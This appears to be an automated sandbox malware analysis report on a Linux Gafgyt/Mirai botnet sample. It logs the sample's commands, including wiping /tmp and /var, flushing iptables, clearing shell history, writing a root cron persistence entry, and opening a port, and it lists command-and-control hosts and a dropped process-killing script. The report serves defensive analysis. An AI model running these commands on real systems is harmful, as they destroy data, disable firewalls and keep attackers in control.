              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/14/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/15/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/15/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/16/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/16/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/17/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/17/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/18/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/18/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/19/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/19/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/1591/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/1591/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/120/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/120/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/121/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/121/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/1/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/1/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/122/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/122/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/243/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/243/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/2/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/2/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/123/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/123/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/3/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/3/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/124/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/124/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/1588/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/1588/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/125/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/125/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/4/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/4/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/246/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/246/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/126/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/126/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/5/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/5/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/127/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/127/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/6/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/6/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/1585/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/1585/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/128/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/128/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/7/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/7/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/129/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/129/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/8/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/8/cmdlineJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5520)Shell command executed: sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp"Jump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5534)Shell command executed: sh -c "rm -rf /tmp/*"Jump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5537)Shell command executed: sh -c "iptables -F"Jump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5543)Shell command executed: sh -c "pkill -9 busybox"Jump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5551)Shell command executed: sh -c "pkill -9 perl"Jump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5560)Shell command executed: sh -c "pkill -9 python"Jump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5563)Shell command executed: sh -c "service iptables stop"Jump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5575)Shell command executed: sh -c "/sbin/iptables -F; /sbin/iptables -X"Jump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5579)Shell command executed: sh -c "service firewall stop"Jump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5612)Shell command executed: sh -c "history -c"Jump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5614)Shell command executed: sh -c "rm -rf ~/.bash_history"Jump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5617)Shell command executed: sh -c "history -w"Jump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5627)Shell command executed: sh -c "chmod +x /dev/ocmount"Jump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5635)Shell command executed: sh -c "echo '* * * * * root /bin/bash /dev/ocmount' > /etc/cron.d/mount.sh"Jump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5683)Shell command executed: sh -c /dev/ocmountJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5914)Shell command executed: sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5936)Shell command executed: sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5939)Shell command executed: sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5942)Shell command executed: sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5945)Shell command executed: sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5886)Shell command executed: sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5906)Shell command executed: sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5909)Shell command executed: sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5929)Shell command executed: sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5932)Shell command executed: sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /bin/sh (PID: 5632)Chmod executable: /usr/bin/chmod -> chmod +x /dev/ocmountJump to behavior
              Source: /bin/sh (PID: 5539)Iptables executable: /usr/sbin/iptables -> iptables -FJump to behavior
              Source: /bin/sh (PID: 5577)Iptables executable: /sbin/iptables -> /sbin/iptables -FJump to behavior
              Source: /bin/sh (PID: 5578)Iptables executable: /sbin/iptables -> /sbin/iptables -XJump to behavior
              Source: /bin/sh (PID: 5928)Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
              Source: /bin/sh (PID: 5899)Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
              Source: /bin/sh (PID: 5549)Pkill executable: /usr/bin/pkill -> pkill -9 busyboxJump to behavior
              Source: /bin/sh (PID: 5556)Pkill executable: /usr/bin/pkill -> pkill -9 perlJump to behavior
              Source: /bin/sh (PID: 5562)Pkill executable: /usr/bin/pkill -> pkill -9 pythonJump to behavior
              Source: /usr/bin/dash (PID: 5506)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.fI4m1NBVX4 /tmp/tmp.0aDbaPXlHh /tmp/tmp.j6TAhrR2IjJump to behavior
              Source: /usr/bin/dash (PID: 5507)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.fI4m1NBVX4 /tmp/tmp.0aDbaPXlHh /tmp/tmp.j6TAhrR2IjJump to behavior
              Source: /bin/sh (PID: 5522)Rm executable: /usr/bin/rm -> rm -rf /tmp/OocBsRyXoT.elf /tmp/config-err-8GMGF7 /tmp/dmesgtail.log /tmp/hsperfdata_root /tmp/snap-private-tmp /tmp/snap.lxd /tmp/ssh-oCVxfzsbTQaT /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-ModemManager.service-gKnN3f /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-colord.service-ttuwai /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-fwupd.service-RBxnUi /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-switcheroo-control.service-2Gilej /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-systemd-logind.service-Nw8Bch /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-systemd-resolved.service-b6o3kh /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-systemd-timedated.service-57YtQh /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-upower.service-70vK5e /tmp/vmware-root_724-2965906890 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-ModemManager.service-8RZKbg /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-colord.service-i36c6f /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-fwupd.service-ScOpqh /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-switcheroo-control.service-HC2Noh /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-systemd-logind.service-IgPdPh /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-systemd-resolved.service-VqRX8h /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-systemd-timedated.service-JxTQHi /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-upower.service-aLITRg /var/log/wtmpJump to behavior
              Source: /bin/sh (PID: 5536)Rm executable: /usr/bin/rm -> rm -rf /tmp/*Jump to behavior
              Source: /bin/sh (PID: 5616)Rm executable: /usr/bin/rm -> rm -rf /root/.bash_historyJump to behavior
              Source: /usr/sbin/service (PID: 5565)Systemctl executable: /usr/bin/systemctl -> systemctl stop iptables.serviceJump to behavior
              Source: /usr/sbin/service (PID: 5568)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.targetJump to behavior
              Source: /usr/sbin/service (PID: 5570)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socketJump to behavior
              Source: /usr/sbin/service (PID: 5581)Systemctl executable: /usr/bin/systemctl -> systemctl stop firewall.serviceJump to behavior
              Source: /usr/sbin/service (PID: 5584)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.targetJump to behavior
              Source: /usr/sbin/service (PID: 5586)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socketJump to behavior
              Source: /usr/bin/chmod (PID: 5632)File: /dev/ocmount (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /bin/sh (PID: 5635)Crontab like entry written: /etc/cron.d/mount.shJump to dropped file
              Source: /tmp/OocBsRyXoT.elf (PID: 5624)Writes shell script file to disk with an unusual file extension: /dev/ocmountJump to dropped file
              Source: /usr/sbin/service (PID: 5571)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/pJump to behavior
              Source: /usr/sbin/service (PID: 5587)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/pJump to behavior
              Source: submitted sampleStderr: Failed to stop iptables.service: Unit iptables.service not loaded.Failed to stop firewall.service: Unit firewall.service not loaded.sh: 1: history: not foundsh: 1: history: not found: exit code = 0

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: /usr/bin/rm (PID: 5522)File: /tmp/OocBsRyXoT.elfJump to behavior
              Source: /usr/bin/pkill (PID: 5549)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
              Source: /usr/bin/pkill (PID: 5556)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5516)Queries kernel information via 'uname': Jump to behavior
              Source: /bin/busybox (PID: 5938)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/busybox (PID: 5947)Queries kernel information via 'uname': Jump to behavior
              Source: /bin/busybox (PID: 5908)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/busybox (PID: 5934)Queries kernel information via 'uname': Jump to behavior
              Source: OocBsRyXoT.elf, 5516.1.000055a4e20fd000.000055a4e21a8000.rw-.sdmp, OocBsRyXoT.elf, 5911.1.000055a4e20fd000.000055a4e21a8000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mips
              Source: OocBsRyXoT.elf, 5516.1.000055a4e20fd000.000055a4e21a8000.rw-.sdmp, OocBsRyXoT.elf, 5911.1.000055a4e20fd000.000055a4e21a8000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
              Source: OocBsRyXoT.elf, 5516.1.00007ffc8e130000.00007ffc8e151000.rw-.sdmp, OocBsRyXoT.elf, 5911.1.00007ffc8e130000.00007ffc8e151000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips
              Source: OocBsRyXoT.elf, 5516.1.00007ffc8e130000.00007ffc8e151000.rw-.sdmp, OocBsRyXoT.elf, 5911.1.00007ffc8e130000.00007ffc8e151000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mips/tmp/OocBsRyXoT.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/OocBsRyXoT.elf

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: OocBsRyXoT.elf, type: SAMPLE
              Source: Yara matchFile source: 5516.1.00007f4db4400000.00007f4db4434000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5911.1.00007f4db4400000.00007f4db4434000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: OocBsRyXoT.elf, type: SAMPLE
              Source: Yara matchFile source: 5516.1.00007f4db4400000.00007f4db4434000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5911.1.00007f4db4400000.00007f4db4434000.r-x.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: OocBsRyXoT.elf, type: SAMPLE
              Source: Yara matchFile source: 5516.1.00007f4db4400000.00007f4db4434000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5911.1.00007f4db4400000.00007f4db4434000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: OocBsRyXoT.elf, type: SAMPLE
              Source: Yara matchFile source: 5516.1.00007f4db4400000.00007f4db4434000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5911.1.00007f4db4400000.00007f4db4434000.r-x.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting
              Valid Accounts1
              Command and Scripting Interpreter
              1
              Systemd Service
              1
              Systemd Service
              1
              Disable or Modify Tools
              1
              OS Credential Dumping
              11
              Security Software Discovery
              Remote ServicesData from Local System1
              Non-Standard Port
              Exfiltration Over Other Network Medium1
              Service Stop
              CredentialsDomainsDefault Accounts1
              Scheduled Task/Job
              1
              Scheduled Task/Job
              1
              Scheduled Task/Job
              2
              File and Directory Permissions Modification
              LSASS Memory1
              System Network Configuration Discovery
              Remote Desktop ProtocolData from Removable Media1
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt1
              Scripting
              Logon Script (Windows)1
              Hidden Files and Directories
              Security Account Manager1
              System Information Discovery
              SMB/Windows Admin SharesData from Network Shared Drive1
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Disable or Modify System Firewall
              NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              File Deletion
              LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              No configs have been found
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Number of created Files
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1527523 Sample: OocBsRyXoT.elf Startdate: 07/10/2024 Architecture: LINUX Score: 96 101 octopus1337.geek 156.238.224.214, 52852, 52854, 52858 XHOSTSERVERUS Seychelles 2->101 103 212.118.43.167, 2222, 45408 CITYLAN-ASRU Russian Federation 2->103 107 Antivirus / Scanner detection for submitted sample 2->107 109 Multi AV Scanner detection for submitted file 2->109 111 Yara detected Gafgyt 2->111 113 Yara detected Mirai 2->113 11 dash rm OocBsRyXoT.elf 2->11         started        13 gnome-session-binary sh gsd-wacom 2->13         started        15 gnome-session-binary sh gsd-keyboard 2->15         started        17 22 other processes 2->17 signatures3 process4 process5 19 OocBsRyXoT.elf 11->19         started        21 OocBsRyXoT.elf sh 11->21         started        23 OocBsRyXoT.elf sh 11->23         started        25 10 other processes 11->25 process6 27 OocBsRyXoT.elf 19->27         started        31 OocBsRyXoT.elf 19->31         started        33 OocBsRyXoT.elf 19->33         started        43 3 other processes 19->43 35 sh service systemctl 21->35         started        37 sh rm 23->37         started        39 sh service systemctl 25->39         started        41 sh rm 25->41         started        45 7 other processes 25->45 file7 99 /dev/ocmount, Bourne-Again 27->99 dropped 119 Manipulation of devices in /dev 27->119 47 OocBsRyXoT.elf 27->47         started        49 OocBsRyXoT.elf sh 27->49         started        59 4 other processes 27->59 53 OocBsRyXoT.elf sh 31->53         started        61 4 other processes 31->61 121 Sample tries to kill multiple processes (SIGKILL) 33->121 123 Tries to stop the "iptables" service 35->123 55 service 35->55         started        63 3 other processes 35->63 125 Sample deletes itself 37->125 65 4 other processes 39->65 57 OocBsRyXoT.elf 43->57         started        signatures8 process9 file10 67 OocBsRyXoT.elf sh 47->67         started        69 OocBsRyXoT.elf sh 47->69         started        71 OocBsRyXoT.elf sh 47->71         started        76 2 other processes 47->76 97 /etc/cron.d/mount.sh, ASCII 49->97 dropped 105 Sample tries to persist itself using cron 49->105 73 sh iptables 53->73         started        78 2 other processes 55->78 80 3 other processes 59->80 82 4 other processes 61->82 84 2 other processes 65->84 signatures11 process12 signatures13 86 sh iptables 67->86         started        89 sh busybox 69->89         started        91 sh busybox 71->91         started        117 Executes the "iptables" command to insert, remove and/or manipulate rules 73->117 93 sh 76->93         started        95 sh 76->95         started        process14 signatures15 115 Executes the "iptables" command to insert, remove and/or manipulate rules 86->115

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              OocBsRyXoT.elf50%ReversingLabsLinux.Backdoor.Gafgyt
              OocBsRyXoT.elf100%AviraEXP/ELF.Mirai.W
              SourceDetectionScannerLabelLink
              /dev/ocmount0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              octopus1337.geek
              156.238.224.214
              truefalse
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://Change_ip/octopus_re.sh;chmodOocBsRyXoT.elffalse
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  156.238.224.214
                  octopus1337.geekSeychelles
                  394281XHOSTSERVERUSfalse
                  212.118.43.167
                  unknownRussian Federation
                  25308CITYLAN-ASRUfalse
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  156.238.224.214HNzkADzkE2.elfGet hashmaliciousGafgyt, MiraiBrowse
                    arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                      x86.elfGet hashmaliciousMiraiBrowse
                        arm7.elfGet hashmaliciousMiraiBrowse
                          212.118.43.167HNzkADzkE2.elfGet hashmaliciousGafgyt, MiraiBrowse
                            arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                              x86.elfGet hashmaliciousMiraiBrowse
                                arm7.elfGet hashmaliciousMiraiBrowse
                                  0tGEmgFUHk.elfGet hashmaliciousUnknownBrowse
                                    lhZOo8vhuI.elfGet hashmaliciousUnknownBrowse
                                      uV4x1JLrrF.elfGet hashmaliciousUnknownBrowse
                                        DQVl3rjqoZ.elfGet hashmaliciousGafgytBrowse
                                          9jjtFFX0Tb.elfGet hashmaliciousUnknownBrowse
                                            ceKWlceqnf.elfGet hashmaliciousUnknownBrowse
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              octopus1337.geekHNzkADzkE2.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 156.238.224.214
                                              arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 156.238.224.214
                                              x86.elfGet hashmaliciousMiraiBrowse
                                              • 156.238.224.214
                                              arm7.elfGet hashmaliciousMiraiBrowse
                                              • 156.238.224.214
                                              oc_x86_64.elfGet hashmaliciousMiraiBrowse
                                              • 149.88.81.199
                                              oc_aarch64.elfGet hashmaliciousUnknownBrowse
                                              • 149.88.81.199
                                              oc_mips.elfGet hashmaliciousUnknownBrowse
                                              • 149.88.81.199
                                              oc_i686.elfGet hashmaliciousMiraiBrowse
                                              • 149.88.81.199
                                              oc_arm7.elfGet hashmaliciousUnknownBrowse
                                              • 149.88.81.199
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              CITYLAN-ASRUHNzkADzkE2.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 212.118.43.167
                                              arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 212.118.43.167
                                              x86.elfGet hashmaliciousMiraiBrowse
                                              • 212.118.43.167
                                              arm7.elfGet hashmaliciousMiraiBrowse
                                              • 212.118.43.167
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 88.210.6.42
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 88.210.6.42
                                              0tGEmgFUHk.elfGet hashmaliciousUnknownBrowse
                                              • 212.118.43.167
                                              lhZOo8vhuI.elfGet hashmaliciousUnknownBrowse
                                              • 212.118.43.167
                                              uV4x1JLrrF.elfGet hashmaliciousUnknownBrowse
                                              • 212.118.43.167
                                              DQVl3rjqoZ.elfGet hashmaliciousGafgytBrowse
                                              • 212.118.43.167
                                              XHOSTSERVERUSHNzkADzkE2.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 156.238.224.214
                                              na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 156.254.22.230
                                              arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 156.238.224.214
                                              x86.elfGet hashmaliciousMiraiBrowse
                                              • 156.238.224.214
                                              arm7.elfGet hashmaliciousMiraiBrowse
                                              • 156.238.224.214
                                              https://tiktokmal1vip.com/Get hashmaliciousUnknownBrowse
                                              • 156.238.242.50
                                              https://tkglobalmall.vip/Get hashmaliciousUnknownBrowse
                                              • 156.238.242.50
                                              https://www.gbt-inc.com/Get hashmaliciousUnknownBrowse
                                              • 156.238.197.18
                                              M46uio5ezW.exeGet hashmaliciousXWormBrowse
                                              • 156.238.224.69
                                              154.216.17.9-skid.arm-2024-08-04T06_22_56.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 156.254.22.232
                                              No context
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              /dev/ocmountHNzkADzkE2.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                  x86.elfGet hashmaliciousMiraiBrowse
                                                    arm7.elfGet hashmaliciousMiraiBrowse
                                                      oc_i486.elfGet hashmaliciousMiraiBrowse
                                                        oc_x86_64.elfGet hashmaliciousMiraiBrowse
                                                          oc_aarch64.elfGet hashmaliciousUnknownBrowse
                                                            oc_mips.elfGet hashmaliciousUnknownBrowse
                                                              oc_i686.elfGet hashmaliciousMiraiBrowse
                                                                oc_arm7.elfGet hashmaliciousUnknownBrowse
                                                                  Process:/tmp/OocBsRyXoT.elf
                                                                  File Type:Bourne-Again shell script, ASCII text executable
                                                                  Category:dropped
                                                                  Size (bytes):479
                                                                  Entropy (8bit):4.026921351476117
                                                                  Encrypted:false
                                                                  SSDEEP:6:9rd/9GjuZZXegND07aW02vFgWccOHmAyCHOC1A9KiyhlrxleXUEMJJPJHeIHyHi5:rFGjuZog2+WvFgxq6DhllleXRW8ISCuU
                                                                  MD5:A3FC64B86B20A7B2EAA9330E1064D1F1
                                                                  SHA1:3A6F294C550A578D5E337F67FD4D9C1984EEA885
                                                                  SHA-256:6029DD069BC913653EEC32E54FB005A80FB71EBB5F0A584C71E06AC08FBBECE6
                                                                  SHA-512:CE26F2C6ECEC049B7053008E323018EC8A709942A456464A1D423F80B92BCA410D9B0F661093EB732254E6690900AC9A15B6F62450F72E6511195AEE403C50B6
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Joe Sandbox View:
                                                                  • Filename: HNzkADzkE2.elf, Detection: malicious, Browse
                                                                  • Filename: arm5.elf, Detection: malicious, Browse
                                                                  • Filename: x86.elf, Detection: malicious, Browse
                                                                  • Filename: arm7.elf, Detection: malicious, Browse
                                                                  • Filename: oc_i486.elf, Detection: malicious, Browse
                                                                  • Filename: oc_x86_64.elf, Detection: malicious, Browse
                                                                  • Filename: oc_aarch64.elf, Detection: malicious, Browse
                                                                  • Filename: oc_mips.elf, Detection: malicious, Browse
                                                                  • Filename: oc_i686.elf, Detection: malicious, Browse
                                                                  • Filename: oc_arm7.elf, Detection: malicious, Browse
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:#!/bin/bash..while true; do. cat /proc/$$/mountinfo | while read -r line; do. if [[ $line == *" /proc/"* ]]; then. if [[ $line != *"/boot"* ]]; then. PID=$(echo $line | grep -o "/proc/[0-9]*" | grep -o "[0-9]*"). PID=${PID#/proc/}. if [[ -n "$PID" ]]; then. echo "Found process the and kill pid: $PID". kill -9 $PID. fi. fi. fi. done. sleep 30.done.
                                                                  Process:/bin/sh
                                                                  File Type:ASCII text
                                                                  Category:dropped
